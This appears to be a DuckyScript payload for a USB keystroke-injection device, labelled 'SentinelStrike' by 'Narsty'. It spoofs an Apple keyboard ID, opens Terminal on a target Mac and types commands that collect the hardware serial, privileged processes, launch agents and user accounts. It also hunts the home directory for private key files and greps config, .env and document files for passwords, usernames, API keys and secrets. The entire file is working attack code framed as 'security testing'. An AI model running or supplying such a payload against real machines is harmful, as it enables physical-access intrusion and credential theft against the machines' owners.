83 lines
2.2 KiB
Plaintext
83 lines
2.2 KiB
Plaintext
REM macOS Security Testing and Reconnaissance Duckyscript (Local System)
|
|
REM Unveiling the Depths of macOS Security
|
|
REM Comprehensive Testing and Advanced Reconnaissance Capabilities
|
|
REM This Script pulls just about everything you would need to know about a target MAC
|
|
|
|
REM Author: Narsty
|
|
REM Title: SentinelStrike
|
|
REM Target: MacOS
|
|
REM Version: 1.0
|
|
REM Category: RECON
|
|
|
|
ID 05ac:021e Apple:Keyboard
|
|
DELAY 1000
|
|
GUI SPACE
|
|
DELAY 500
|
|
STRING Terminal
|
|
DELAY 500
|
|
ENTER
|
|
DELAY 500
|
|
STRING clear
|
|
ENTER
|
|
DELAY 500
|
|
STRING echo "Starting local system security testing and reconnaissance..."
|
|
ENTER
|
|
DELAY 1000
|
|
|
|
REM Gather System Information
|
|
STRING echo "----- System Information -----"
|
|
ENTER
|
|
STRING system_profiler SPHardwareDataType SPSoftwareDataType | grep -E "Model Identifier|Processor Name|Memory|Serial Number|OS Version" | sed 's/^\s*//'
|
|
ENTER
|
|
DELAY 1000
|
|
|
|
REM Check for Suspicious Processes
|
|
STRING echo "----- Suspicious Processes -----"
|
|
ENTER
|
|
STRING ps aux | grep -E "root|admin" | grep -v grep | awk '{print $2, $11}'
|
|
ENTER
|
|
DELAY 1000
|
|
|
|
REM List Startup Items
|
|
STRING echo "----- Startup Items -----"
|
|
ENTER
|
|
STRING ls -la /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents
|
|
ENTER
|
|
DELAY 1000
|
|
|
|
REM Check User Accounts
|
|
STRING echo "----- User Accounts -----"
|
|
ENTER
|
|
STRING dscl . -list /Users | grep -v '_'
|
|
ENTER
|
|
DELAY 1000
|
|
|
|
REM Find Sensitive Files
|
|
STRING echo "----- Sensitive Files -----"
|
|
ENTER
|
|
STRING find ~ -type f \( -iname "*.key" -o -iname "*.pem" -o -iname "*.rsa" \) 2>/dev/null
|
|
ENTER
|
|
DELAY 1000
|
|
|
|
REM Search for Sensitive Information
|
|
STRING echo "----- Sensitive Information -----"
|
|
ENTER
|
|
STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --include='*.xml' --include='*.conf' --include='*.config' --include='*.properties' --include='*.ini' --include='*.env' --exclude-dir='.git' --exclude-dir='node_modules' "password\|username\|apikey\|secret" ~ 2>/dev/null
|
|
ENTER
|
|
DELAY 1000
|
|
|
|
REM Check for Unsecured Files and Directories
|
|
STRING echo "----- Unsecured Files and Directories -----"
|
|
ENTER
|
|
STRING find ~ -type d \( -iname "public" -o -iname "www" \) 2>/dev/null
|
|
ENTER
|
|
DELAY 1000
|
|
|
|
REM Finished
|
|
STRING echo "----- Security testing and reconnaissance completed! -----"
|
|
ENTER
|
|
|
|
|
|
|
|
|